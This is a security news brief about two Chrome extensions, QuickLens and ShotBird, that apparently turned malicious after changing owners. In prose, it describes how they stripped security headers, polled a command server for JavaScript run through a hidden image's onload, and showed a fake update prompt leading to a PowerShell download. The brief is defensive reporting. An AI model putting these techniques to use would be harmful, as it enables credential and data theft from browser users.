Two Chrome extensions were weaponized after apparent ownership transfers, allowing attackers to push remote JavaScript, bypass browser protections, and harvest data. QuickLens had about 7,000 users and ShotBird about 800 users. The QuickLens update appeared on February 17, 2026.
KEY FACTS
- Incident Two Chrome extensions were updated to include malicious capabilities
- Extensions QuickLens and ShotBird
- Users QuickLens ~7,000 users, ShotBird ~800 users
- Technique Remote JavaScript execution, header stripping, and host‑level payload delivery
In a technical analysis by monxresearch-sec, researchers found the QuickLens update removed security headers such as X-Frame-Options, polled a command server every five minutes for JavaScript, stored payloads in local storage, and executed them by inserting a hidden 1×1 image whose onload attribute ran the code.
The ShotBird code delivered JavaScript by direct callbacks that displayed a fake Chrome update prompt. Clicking the prompt led users into a flow that instructed them to run a PowerShell command, which downloaded an executable named googleupdate.exe on Windows machines.
The malicious extensions can strip security headers and bypass Content Security Policy protections, inject scripts into pages, hook input and form elements, and capture entered data and stored browser information, including saved credentials and history.
QuickLens is no longer available on the Chrome Web Store while ShotBird remained accessible at the time of reporting. Users are advised to remove unknown extensions, avoid installing unverified productivity add-ons, and audit browsers for unexpected entries.
WHY IT MATTERS
Weaponized extensions can convert widely deployed productivity tools into persistent data exfiltration and endpoint compromise mechanisms. Treat browser extensions as an attack surface and remove or audit untrusted add-ons.